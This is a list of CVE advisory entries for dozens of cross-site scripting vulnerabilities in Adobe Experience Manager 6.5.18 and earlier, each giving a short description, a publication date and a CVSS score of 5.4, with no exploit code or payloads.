Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48496
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48497
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48498
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48499
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48500
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48501
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48502
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48503
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48504
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48505
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48506
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48507
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48508
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48509
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48510
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48511
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48512
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48513
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48514
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48515
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48516
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48517
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48518
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48519
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48520
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48521
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48522
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48523
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48524
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48525
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48526
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48527
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48528
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48529
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48530
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48531
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48532
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48533
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48534
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48535
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48536
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48537
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48538
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48539
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48540
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48541
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48542
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48543
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48544
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48545
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48546
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48547
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48548
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48549
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48550
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48551
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48552
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48553
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48554
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48555
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48556
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48557
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48558
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48559
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48560
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48561
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48562
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48563
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48564
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48565
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48566
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48567
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48568
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48569
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48570
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48571
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48572
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48573
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48574
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48575
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48576
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48577
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48578
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48579
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48580
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48581
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48582
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48583
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48584
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48585
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48586
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48587
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.
2023-12-15
5.4
CVE-2023-48588
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48589
[email protected]
adobe -- experience_manager
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
2023-12-15
5.4
CVE-2023-48590
[email protected]
adobe -- experience_manager
